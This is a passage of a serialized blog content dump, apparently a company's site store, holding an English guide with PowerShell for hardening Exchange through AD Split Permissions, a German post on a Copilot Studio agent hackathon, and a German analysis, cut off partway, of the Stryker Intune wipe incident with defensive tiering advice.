users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[353,29635,29636],{},[356,29637],{"alt":29074,"src":29075},[353,29639,29640],{},[433,29641,29079],{},[5026,29643,29645,29649,29651],{"style":29644},"margin: 0.25rem 0",[370,29646,29084,29647],{},[374,29648,29089],{"href":29087},[370,29650,29094],{},[370,29652,29099],{},[353,29654,29104],{},[29656,29657],"video-frame",{"thumb":29658,"alt":29659,"id":29660,":full-width":7391},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[2559,29662,29664],{"style":29663},"background:var(--color-black-4); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-blue-dark)","Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[2548,29666,29108],{"id":29107},[353,29668,29669,29670,29672,29114],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[2970,29671],{},[2970,29673],{},[367,29675,29676,29678,29680,29682],{"style":29644},[370,29677,29119],{},[370,29679,29122],{},[370,29681,29125],{},[370,29683,29128],{},[353,29685,29686],{},[356,29687],{"alt":29133,"src":29134},[353,29689,29690],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[353,29692,29693],{},[433,29694,29141],{},[367,29696,29697,29700,29716],{"style":29644},[370,29698,29699],{},"Entra Connect Sync account when using Password Hash Sync",[370,29701,29702,29703],{},"Default groups",[367,29704,29706,29709,29714],{"style":29705},"margin: 0",[370,29707,29708],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[370,29710,29157,29711,29163],{},[374,29712,29162],{"href":29713,"target":5319},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta",[370,29715,29166],{},[370,29717,29718,29719],{},"Unprotected custom groups or admin/service accounts",[367,29720,29721,29723],{"style":29705},[370,29722,29174],{},[370,29724,29177],{},[353,29726,29727,29728,29730,29183,29732,29735,29737,29191,29739],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2970,29729],{},[2970,29731],{},[374,29733,29188],{"href":29186,"rel":29734},[378],[2970,29736],{},[2970,29738],{},[374,29740,29196],{"href":29194,"rel":29741},[378],[2548,29743,29200],{"id":29199},[353,29745,29746,29747,29749,29206],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[2970,29748],{},[2970,29750],{},[2179,29752,29753],{},[353,29754,29755,29758],{},[433,29756,29757],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[353,29760,29761],{},[433,29762,29218],{},[367,29764,29765,29774],{"style":29644},[370,29766,29767,29768],{},"New-Mailbox (where Exchange writes to AD) would be:",[367,29769,29770,29772],{"style":29705},[370,29771,29228],{},[370,29773,29231],{},[370,29775,29234],{},[2548,29777,29238],{"id":29237},[353,29779,29780,29782],{},[433,29781,29243],{},": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[629,29784,29248],{"id":29247},[353,29786,29787],{},[433,29788,29789],{},"You should first check which of the affected cmdlets are in use on which OUs:",[28514,29791,29792,29799,29801,29807,29809],{},[7258,29793,29794,29798],{},[7258,29795,29797],{"style":29796},"color:var(--color-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[2970,29800],{},[7258,29802,29803,29806],{},[7258,29804,29805],{"style":29796},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[2970,29808],{},[7258,29810,29811,1501,29814,29818,29819,1501,29822,29824,29825,29828,29829,1501,29832,1501,29835,1501,29837,29840,29841,29844,29845],{},[7258,29812,29813],{"style":29796},"Search-AdminAuditLog",[7258,29815,29817],{"style":29816},"color:var(--color-blue-medium)","-ResultSize"," 99000 ",[7258,29820,29821],{"style":29816},"-Cmdlets",[7258,29823,29805],{"style":29796}," | ",[7258,29826,29827],{"style":29796},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[7258,29830,29831],{"style":29796},"Export-Csv",[7258,29833,29834],{"style":29816},"-Path",[7258,29836,29797],{"style":29796},[7258,29838,29839],{"style":29816},"-Delimiter"," \";\" ",[7258,29842,29843],{"style":29816},"-Encoding"," Unicode ",[7258,29846,29847],{"style":29816},"-NoTypeInformation",[353,29849,29850],{},[433,29851,29273],{},[28514,29853,29854,29870,29872,29880,29882],{},[7258,29855,29856,29859,29860,1501,29863,1501,29865,1501,29867,29869],{},[7258,29857,29858],{"style":29796},"$CSVs"," = ",[7258,29861,29862],{"style":29796},"Import-Csv",[7258,29864,29834],{"style":29816},[7258,29866,29797],{"style":29796},[7258,29868,29839],{"style":29816}," \";\"",[2970,29871],{},[7258,29873,29874,29824,29876,29879],{},[7258,29875,29858],{"style":29796},[7258,29877,29878],{"style":29796},"Group-Object"," Caller",[2970,29881],{},[7258,29883,29884,29824,29886,29888],{},[7258,29885,29858],{"style":29796},[7258,29887,29878],{"style":29796}," CmdletName",[353,29890,29891],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[2548,29893,29894],{"id":29290},"Enable Split Permissions Model",[353,29896,29897,29898,29901,29902,29906],{},"Follow Microsoft's instructions ",[433,29899,29900],{},"\"Switch to Active Directory split permissions\""," in\n",[374,29903,29188],{"href":29904,"rel":29905},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[378],[748,29907,29908],{},"(NOT RBAC split permissions)",[353,29910,29911,29912,29915],{},"In essence, it will remove the dangerous permissions of the ",[433,29913,29914],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[28514,29917,29918],{},[7258,29919,29920,1501,29923,1501,29926,1501,29929],{},[7258,29921,29922],{"style":29796},"Setup.exe",[7258,29924,29925],{"style":29816},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[7258,29927,29928],{"style":29816},"/PrepareAD",[7258,29930,29931],{"style":29816},"/ActiveDirectorySplitPermissions:true",[2559,29933,8923,29935,29937,29938],{"style":29934},"background:#f4f4f4; border-left:4px solid var(--color-green-blue); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[433,29936,29757],{}," To revert back, simply use ",[3724,29939,29316],{},[629,29941,29320],{"id":29319},[353,29943,29944],{},"Create a custom AD group and make Exchange servers members.",[28514,29946,29947,29953,29955,1501,29958,29961,29962,29965,29966,29969,29970,1501,29972,1501,29975,29978,29979,29981,29961,29984,29987,29988],{},[7258,29948,29949],{},[7258,29950,29952],{"style":29951},"color:var(--color-black-40)","# adjust OU Path first!",[2970,29954],{},[7258,29956,29957],{"style":29796},"New-ADGroup",[7258,29959,29960],{"style":29816},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[7258,29963,29964],{"style":29816},"-GroupCategory"," Security ",[7258,29967,29968],{"style":29816},"-GroupScope"," DomainLocal ",[7258,29971,29834],{"style":29816},[433,29973,29974],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[7258,29976,29977],{"style":29816},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[2970,29980],{},[7258,29982,29983],{"style":29796},"Add-ADGroupMember",[7258,29985,29986],{"style":29816},"-Members"," \"Exchange Trusted Subsystem\"\n",[7258,29989,29990],{"style":29951},"# reboot Exchange servers for permissions via group to work",[353,29992,29993],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[2179,29995,29996],{},[353,29997,29998,29999,29362],{},"Without these permissions the Exchange server would receive the error ",[3724,30000,29361],{},[353,30002,29367,30003,29373],{},[374,30004,29372],{"href":29370,"rel":30005},[378],[353,30007,30008],{},"It can grant the following PermissionTypes:",[353,30010,30012,30014,29388,30016,30018],{"style":30011},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[433,30013,29383],{},[2970,30015],{},[2970,30017],{},[10887,30019,30020],{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[353,30022,30024,30026,29401,30028,30030],{"style":30023},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[433,30025,29396],{},[2970,30027],{},[2970,30029],{},[10887,30031,30032,30033,30035],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[2970,30034],{},"Also: user managing DistributionGroups they own via EAC",[353,30037,30038,30040,30042,30043,30045],{"style":30023},[433,30039,29416],{},[2970,30041],{},"Modify AD Permissions on Users",[2970,30044],{},[10887,30046,30047],{},"Exchange cmdlet: `Add-ADPermission`",[353,30049,30050,30052,30054,30055,30057],{"style":30023},[433,30051,29429],{},[2970,30053],{},"Modify AD Permissions on Groups",[2970,30056],{},[10887,30058,30047],{},[353,30060,30061],{},[433,30062,29440],{},[28514,30064,30065,1501,30067,30070,30071,30073,30074,30077,30078,30081,30083,1501,30085,30087,30088,30090,30091,30077,30093,1501,30095,30087,30097,30099,30100,30077,30102,1501,30104,30106,30107,30109,30110,30077,30112,1501,30114,30106,30116,30118,30119,30077],{},[7258,30066,29372],{"style":29796},[7258,30068,30069],{"style":29816},"-TargetOU"," \u003COU> ",[7258,30072,29456],{"style":29816}," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[7258,30075,30076],{"style":29816},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[7258,30079,30080],{"style":29951},"# For example",[2970,30082],{},[7258,30084,29372],{"style":29796},[7258,30086,30069],{"style":29816}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[7258,30089,29456],{"style":29816}," GroupManage ",[7258,30092,30076],{"style":29816},[7258,30094,29372],{"style":29796},[7258,30096,30069],{"style":29816},[7258,30098,29456],{"style":29816}," GroupSendAs ",[7258,30101,30076],{"style":29816},[7258,30103,29372],{"style":29796},[7258,30105,30069],{"style":29816}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[7258,30108,29456],{"style":29816}," UserSendAs ",[7258,30111,30076],{"style":29816},[7258,30113,29372],{"style":29796},[7258,30115,30069],{"style":29816},[7258,30117,29456],{"style":29816}," CreateUserAndContact ",[7258,30120,30076],{"style":29816},[629,30122,29517],{"id":29516},[353,30124,30125],{},[433,30126,29522],{},[28514,30128,30129],{},[7258,30130,30131,1501,30134,30136,30137,30140,30141,30143,30144,30146],{},[7258,30132,30133],{"style":29796},"New-RoleGroup",[7258,30135,29960],{"style":29816}," \"SplitPermission Security Group Creation and Membership\" ",[7258,30138,30139],{"style":29816},"-Roles"," \"Security Group Creation and Membership\" ",[7258,30142,29986],{"style":29816}," \"Organization Management\",\"Recipient Management\" ",[7258,30145,29977],{"style":29816}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[2179,30148,30149],{},[353,30150,30151,30153],{},[433,30152,29757],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[353,30155,30156,30158,30160,30162],{},[2970,30157],{},[433,30159,29545],{},[2970,30161],{},[28514,30163,30164,1501,30166,30168,30169,30171,30172,30143,30174,30176],{},[7258,30165,30133],{"style":29796},[7258,30167,29960],{"style":29816}," \"SplitPermission Mail Recipient Creation\" ",[7258,30170,30139],{"style":29816}," \"Mail Recipient Creation\" ",[7258,30173,29986],{"style":29816},[7258,30175,29977],{"style":29816}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[2548,30178,29554],{"id":29553},[353,30180,30181],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[353,30183,30184],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[353,30186,30187,30188,22027,30191,30194],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[374,30189,29568],{"href":29566,"rel":30190},[378],[374,30192,29573],{"href":29571,"rel":30193},[378]," to assess your AD security posture and identify control path exposures.",[10832,30196,29577],{},{"title":402,"searchDepth":403,"depth":403,"links":30198},[30199,30200,30201,30202,30205,30209],{"id":29065,"depth":403,"text":29066},{"id":29107,"depth":403,"text":29108},{"id":29199,"depth":403,"text":29200},{"id":29237,"depth":403,"text":29238,"children":30203},[30204],{"id":29247,"depth":704,"text":29248},{"id":29290,"depth":403,"text":29894,"children":30206},[30207,30208],{"id":29319,"depth":704,"text":29320},{"id":29516,"depth":704,"text":29517},{"id":29553,"depth":403,"text":29554},{"lang":2183,"seoTitle":29596,"titleClass":7896,"date":30211,"blogtitlepic":30212,"socialimg":30213,"customExcerpt":30214,"keywords":29600,"hreflang":30215,"scripts":30222,"asideNav":30223,"maxContent":415,"published":415},"2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.",[30216,30218,30220],{"lang":2183,"href":30217},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":9114,"href":30219},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2118,"href":30221},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":415,"form":415},{"menuItems":30224},[30225,30226,30227,30228,30229],{"href":29610,"text":29066},{"href":29612,"text":29108},{"href":29614,"text":29200},{"href":29616,"text":29238},{"href":29618,"text":29554},"/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":29625,"description":402},"posts/2026-03-01-exchange-ad-split-permissions-hardening","dKNRqovnGNlZuFGmrL8uMpr5U_rSgjynCkt5KdKjLbA",{"id":30235,"title":30236,"author":30237,"body":30238,"cta":3,"description":30242,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":30274,"moment":30276,"navigation":415,"path":30289,"seo":30290,"stem":30291,"tags":30292,"webcast":406,"__hash__":30296},"content_de/posts/2026-03-16-ai-agent-hackathon.md","Sechs Agents. Vier Wochen. Echter Betrieb.",[191],{"type":350,"value":30239,"toc":30272},[30240,30243,30246,30249,30252,30255,30260,30263,30266,30269],[353,30241,30242],{},"Wie viele Stunden verbringt eure IT-Abteilung pro Woche mit Aufgaben, die ein Agent in Minuten erledigen könnte?",[353,30244,30245],{},"Es gibt in der deutschen Unternehmenslandschaft einen Prozess, den fast jede IT-Abteilung kennt: Jemand liest Verträge. Jemand anderes sortiert Anforderungen in Kategorien. Wieder jemand beantwortet dieselben Fragen zu Lieferungen, die gestern schon jemand beantwortet hat. Es sind keine glamourösen Probleme. Aber es sind die, die in Summe Zehntausende Stunden im Jahr kosten und die sich erstaunlich gut für AI Agents eignen, wenn man weiß, wo man den Hebel ansetzt.",[353,30247,30248],{},"Sechs Unternehmen haben im Februar bei uns in Offenbach genau das getan. Kiekert lässt Anforderungen im R&D jetzt regelbasiert kategorisieren, mit Confidence Score und Feedback-Loop. Der Agent läuft bereits produktiv. Dr. Oetker hat einen Contract Review Assistant gebaut, der IT-Verträge auf kritische Klauseln prüft und einen strukturierten Prüfbericht für Einkauf und Legal erstellt. Eckes-Granini ist gleich mit zwei Agents angetreten: einem Onboarding-Agenten, der neue Mitarbeitende ab dem ersten Login durch MFA, Office-Setup und Sicherheitsrichtlinien führt, und einem Logistik-Agenten, der Disponenten Fragen zu Sendungen, Tarifen und Spediteuren beantwortet. igefa hat einen sprachbasierten Hotline-Agenten für den internen IT-Support entwickelt, angebunden an JIRA und Confluence. Und die lila logistik hat das vielleicht ungewöhnlichste Projekt mitgebracht: einen Use Case Generator, der in SharePoint und Exchange beobachtet, wo Automatisierungspotenziale liegen, weil das eigentliche Problem oft nicht die Technologie ist, sondern dass niemand im Unternehmen die richtigen Stellen erkennt.",[353,30250,30251],{},"All das entstand im Copilot Studio, mit Agent Flows, Dataverse Anbindungen und MCP Connectoren, begleitet von vier unserer MVPs. Vier Wochen Build-Phase, neben dem normalen Tagesgeschäft. Die Teilnehmenden mussten sich jede Stunde dafür freischaufeln, neben Tickets, Quartalsabschlüssen und dem operativen Betrieb. Dass am Ende sechs funktionsfähige Agents standen, sagt weniger über die Technologie als über die Teams, die sie gebaut haben.",[353,30253,30254],{},"Am 10. März, Microsoft Office Frankfurt, dann die Probe: Sechs Präsentationen, je 20 Minuten, bewertet nach Business Impact, technischer Tiefe und dem Applaus des Publikums (ja, auch der steht auf dem Bewertungsbogen). Kiekert hat gewonnen, weil ihr Agent produktiv läuft, gebaut von jemandem aus der Fachabteilung, ohne IT-Hintergrund, ohne Vorerfahrung im Copilot Studio. Dr. Oetker, weil die Vertragsprüfung so universell ist, dass die Jury danach über die eigenen IT-Verträge nachdachte. Dass alle sechs Teams in vier Wochen neben dem Tagesgeschäft einen lauffähigen Agent gebaut haben: Das war am Ende die eigentliche Nachricht des Tages.",[29656,30256],{"thumb":30257,"alt":30258,"id":30259,":full-width":7391},"/thumbs/thumb-ai-agent-hackathon.jpg","Präsentation des glueckkanja AI Agent Hackathons im Microsoft Office Frankfurt: Sechs Teams zeigen ihre Copilot Studio Agents vor Publikum.","GjumQAnKj8k",[2559,30261,30262],{"style":29663},"glueckkanja AI Agent Hackathon – Sechs Unternehmen, sechs Agents, vier Wochen",[353,30264,30265],{},"Das Format heißt glueckkanja AI Agent Hackathon. Entstanden aus einem Microsoft Hackathon in München, bei dem wir mit Knorr-Bremse teilgenommen haben. Microsoft hat uns danach gebeten, es mit unseren Kunden weiterzuführen. Die Idee ist einfach: Unternehmen bewerben sich mit einem konkreten Prozess, der heute manuell läuft. Wir schärfen den Use Case, definieren die Architektur und bauen gemeinsam. Wer nicht gleich in den Hackathon einsteigen will: Wir machen auch Workshops, in denen wir Use Cases identifizieren und die Agent Architektur vorbereiten: als Einstieg oder als eigenständiges Format.",[353,30267,30268],{},"Der nächste glueckkanja AI Agent Hackathon startet im Herbst 2026. Die Registrierung ist offen. Wer vorher schon Use Cases identifizieren und die eigene Umgebung vorbereiten will: Wir machen das gerne. Sprecht uns an.",[353,30270,30271],{},"Danke an Sylvia und Miriam von Microsoft für das Vertrauen ins Format. An Kiekert, Dr. Oetker, Eckes-Granini, igefa und die lila logistik für den Mut und den Einsatz. Und an unser glueckkanja-Team, dass ihr das möglich gemacht habt.",{"title":402,"searchDepth":403,"depth":403,"links":30273},[],{"lang":2183,"seoTitle":30275,"titleClass":7896,"date":30276,"categories":30277,"blogtitlepic":30278,"socialimg":30279,"customExcerpt":30280,"keywords":30281,"hreflang":30282,"published":415},"glueckkanja AI Agent Hackathon: Sechs Unternehmen bauen AI Agents mit Copilot Studio","2026-03-16",[410],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Sechs Unternehmen, vier Wochen Build-Phase, sechs funktionierende AI Agents – das war der erste glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa und die lila logistik haben im Copilot Studio Agents gebaut, die heute produktiv laufen. Was dabei entstand und wie das Format funktioniert.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI Agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. Oetker, Eckes-Granini, igefa, lila logistik, AI Automatisierung, Unternehmens-KI, Prozessautomatisierung",[30283,30285,30287],{"lang":2183,"href":30284},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":2118,"href":30286},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":9114,"href":30288},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":30236,"description":30242},"posts/2026-03-16-ai-agent-hackathon",[30293,30294,30295,27812],"AI","Copilot Studio","Hackathon","BSmLQxKkvb1FjxO4PwoRTvTCb36T4sY_v6gsGhCBtvc",{"id":30298,"title":30299,"author":30300,"body":30301,"cta":3,"description":30305,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":30543,"moment":30545,"navigation":415,"path":30597,"seo":30598,"stem":30599,"tags":30600,"webcast":406,"__hash__":30602},"content_de/posts/2026-03-20-stryker-attack-intune-privilege.md","Ein Admin-Konto war alles, was es brauchte.",[164],{"type":350,"value":30302,"toc":30531},[30303,30306,30309,30313,30315,30318,30321,30325,30327,30330,30333,30336,30339,30343,30345,30348,30351,30355,30357,30360,30363,30366,30370,30372,30375,30381,30385,30387,30393,30396,30399,30402,30408,30411,30416,30424,30428,30430,30438,30441,30450,30453,30456,30459,30462,30465,30468,30472,30474,30477,30480,30483,30491,30494,30497,30500,30502],[353,30304,30305],{},"Mittwoch, 11. März 2026. Mitarbeiter in Stryker-Büros in 79 Ländern schalteten ihre Computer ein und fanden sie leer. Login-Bildschirme ersetzt durch ein Logo. Firmen-Laptops, Diensthandys, private Geräte, die im BYOD-Programm des Unternehmens registriert waren – alle gleichzeitig gelöscht, über Nacht. Keine Ransomware, keine Malware-Signaturen, nichts, das ein Endpoint-Detection-Tool hätte erkennen können.",[353,30307,30308],{},"Der Angreifer, eine pro-iranische Hacktivistengruppe namens Handala, hatte Strykers eigene IT-Management-Infrastruktur zur Waffe gemacht.",[2548,30310,30312],{"id":30311},"was-wirklich-passiert-ist","Was wirklich passiert ist",[353,30314,9352],{},[353,30316,30317],{},"Der Kern des Angriffs war kein ausgefeilter Exploit und keine Zero-Day-Schwachstelle, sondern etwas weitaus Einfacheres und weitaus Häufigeres: Ein Administrator-Konto wurde kompromittiert, und dieses Konto hatte Zugang zu Microsoft Intune.",[353,30319,30320],{},"Laut Berichten von BleepingComputer wurden etwa 80.000 Geräte zwischen 5:00 und 8:00 Uhr UTC gelöscht. Handala behauptete, die Zahl habe 200.000 überschritten, darunter Server und mobile Geräte im globalen Betrieb des Unternehmens in 79 Ländern. Ein Angriff, ausgeführt ausschließlich über eine legitime Management-Konsole.",[2548,30322,30324],{"id":30323},"warum-dieser-angriff-erfolgreich-war","Warum dieser Angriff erfolgreich war",[353,30326,9352],{},[353,30328,30329],{},"Es gibt ein strukturelles Problem an der Wurzel dieses Vorfalls, das nicht spezifisch für Stryker ist. Es betrifft die meisten Unternehmen.",[353,30331,30332],{},"Die meisten Organisationen behandeln administrative Aufgaben und die tägliche Arbeit als Aktivitäten, die auf demselben Gerät unter derselben Benutzeridentität problemlos koexistieren können. Ein IT-Administrator beantwortet E-Mails, surft im Internet, klickt gelegentlich auf einen Link und verwaltet von derselben Sitzung, auf demselben Gerät aus Cloud-Infrastruktur, genehmigt Zugriffsänderungen oder berührt, wie in diesem Fall, eine Geräteverwaltungskonsole mit der Berechtigung, die gesamte Geräteflotte zu löschen.",[353,30334,30335],{},"Das ist die Angriffsfläche. Wenn der alltägliche Arbeitskontext und der privilegierte Administrationskontext einen gemeinsamen Endpunkt und eine gemeinsame Identität teilen, ist jede Kompromittierung dieses Endpunkts automatisch eine Kompromittierung von allem, was diese Identität erreichen kann. Phishing, Credential-Diebstahl über Infostealer-Malware, Adversary-in-the-Middle (AiTM) Session-Token-Diebstahl – all das wird zu einem direkten Pfad zu den mächtigsten Kontrollen in der Umgebung. Keine Privilege-Eskalation erforderlich. Der Angreifer nutzt einfach das, was bereits vorhanden ist.",[353,30337,30338],{},"Im Fall von Stryker umfasste dieser Zugang einen Intune-Tenant, der Geräte auf sechs Kontinenten verwaltete.",[2548,30340,30342],{"id":30341},"cisa-hat-genug-gesehen","CISA hat genug gesehen",[353,30344,9352],{},[353,30346,30347],{},"Das Ausmaß und die Dreistigkeit des Angriffs lösten eine ungewöhnliche Reaktion aus: CISA, die US-amerikanische Cybersecurity and Infrastructure Security Agency, veröffentlichte Leitlinien, die direkt das Risiko kompromittierter Geräteverwaltungsplattformen adressieren. Die Behörde bestätigte, dass sie den Angriffsvektor kannte, und forderte Organisationen auf, konkrete Maßnahmen zu ergreifen – sicherzustellen, dass hochriskante Intune-Funktionen wie das Löschen von Geräten die Genehmigung eines zweiten Administrators erfordern, bevor sie ausgeführt werden.",[353,30349,30350],{},"Das ist ein seltenes und bedeutsames Signal. Wenn eine Bundesbehörde für Sicherheit unmittelbar nach einem konkreten Vorfall gezielte Leitlinien herausgibt, ist die Botschaft klar: Das ist kein Randfall. Das ist ein Muster, und andere Organisationen sind mit hoher Wahrscheinlichkeit demselben Risiko ausgesetzt.",[2548,30352,30354],{"id":30353},"trennung-ist-kein-luxus-sie-ist-die-kontrolle","Trennung ist kein Luxus. Sie ist die Kontrolle.",[353,30356,9352],{},[353,30358,30359],{},"Der Stryker-Angriff zeigt in aller Deutlichkeit, welches Ausmaß ein flaches Privilege-Modell haben kann. Der Angreifer musste keine Privilegien durch eine Kette von Schwachstellen eskalieren. Er erlangte Zugang zu Anmeldedaten oder einem Session-Token auf einer Ebene und stellte fest, dass diese Ebene bereits ausreichte, um katastrophalen, globalen, irreversiblen Schaden zu verursachen.",[353,30361,30362],{},"Die architektonische Antwort auf dieses Problem hat einen Namen: das Microsoft Enterprise Access Model (EAM). Sein Kernprinzip ist die gestaffelte Administration: Privilegierte Operationen werden mit dedizierten Konten und dedizierten Geräten durchgeführt, strikt vom alltäglichen Arbeitskontext getrennt. Dieser Least-Privilege-Ansatz bedeutet, dass ein kompromittiertes Produktivitätskonto die Management-Ebene nicht erreichen kann und ein kompromittiertes Management-Konto keine Control-Plane-Operationen durchführen kann. Das gilt gleichermaßen für reine Cloud-Umgebungen und hybride Setups einschließlich On-Premises-Anbindung an Active Directory über Entra ID, wo ein einziges überprivilegiertes Konto nach wie vor die Cloud und die Domäne verbinden kann.",[353,30364,30365],{},"Die Idee ist einfach. Administrative Arbeit findet auf administrativen Geräten statt. Die Identität, die zur Verwaltung des Microsoft 365-Tenants, der Intune-Umgebung oder der Azure-Infrastruktur verwendet wird, ist niemals dieselbe Identität, die zum Lesen von E-Mails oder zur Teilnahme an Teams-Anrufen genutzt wird. Das Gerät, das für diese administrativen Sitzungen verwendet wird, ist gehärtet, eingeschränkt und vom regulären Internet-Browsing und dem Produktivitätskontext isoliert, der die Angriffsfläche erzeugt. Laterale Bewegung wird strukturell schwieriger, weil es keinen lateralen Pfad gibt.",[2548,30367,30369],{"id":30368},"zwei-verteidigungsebenen","Zwei Verteidigungsebenen",[353,30371,9352],{},[353,30373,30374],{},"Um dieses Bedrohungsmodell richtig zu adressieren, muss man gleichzeitig auf zwei Ebenen arbeiten: sichern, wer die Management-Ebene und deren Anmeldedaten berühren kann, und härten, wie diese Management-Ebene selbst konfiguriert und betrieben wird. Das sind nicht dasselbe Problem, und beide sind wichtig.",[353,30376,30377],{},[356,30378],{"alt":30379,"src":30380},"Risiko- und Produktzuordnung für das Stryker-Angriffsszenario: Managed Red Tenant adressiert Identitäts- und Zugriffsrisiken, Managed Intune adressiert Endpoint-Management-Risiken","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[629,30382,30384],{"id":30383},"managed-red-tenant-den-administrativen-kontext-schützen","Managed Red Tenant: den administrativen Kontext schützen",[353,30386,10713],{},[353,30388,30389,30390,30392],{},"Die erste Ebene ist die vollständige Isolierung des privilegierten Zugangs. Dafür ist unser ",[374,30391,11453],{"href":11452}," konzipiert.",[353,30394,30395],{},"Der Managed Red Tenant bietet eine vollständig isolierte, cloudbasierte administrative Umgebung – einen dedizierten Microsoft Entra-Tenant („der Red Tenant\"), der ausschließlich für privilegierte Operationen genutzt wird. Administrative Identitäten leben hier. Administrative Geräte werden hier verwaltet. Nichts aus der regulären Arbeitsumgebung fließt 